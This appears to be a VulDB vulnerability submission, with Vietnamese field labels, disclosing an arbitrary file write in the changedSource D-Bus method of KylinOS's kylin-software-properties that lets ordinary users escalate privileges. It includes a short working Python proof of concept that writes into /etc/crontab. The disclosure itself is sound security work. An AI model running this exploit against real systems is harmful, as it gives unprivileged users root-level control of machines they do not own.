| tiêu đề | Kylin OS kylin-software-properties arbitrary file write vuln |
|---|
| Mô tả | Report
Describe
kylin-software-properties is a component on KylinOS Desktop for setting system software properties. There is an arbitrary file writing vulnerability in the changedSource function of this component, which can lead to privilege escalation for ordinary users.
Hazard level
High
Affected version
kylin-software-properties < 0.0.1-130
POC&&EXP
ISO Download:
https://distro-images.kylinos.cn:8802/web_pungi/download/share/HXDYtGjZm3daA4UvOTLkiPl1nB9ErM0c/
exploit.py
#!/usr/bin/env python3
import sys
import dbus
import os
def change_source(old, new, target):
bus = dbus.SystemBus()
obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
print(proxy.changedSource([old, new, target]))
change_source("#", "rebound shell", "/etc/crontab")
os.system("grep -rn 'rebound shell' /etc/crontab") |
|---|
| Nguồn | ⚠️ https://github.com/i900008/vulndb/blob/main/kylinos_vul1.md |
|---|
| Người dùng | Set3r.Pan (UID 28571) |
|---|
| Đệ trình | 22/05/2023 10:02 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 05/06/2023 07:08 (14 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 230686 [KylinSoft kylin-software-properties trước 0.0.1-130 trên KylinOS changedSource nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|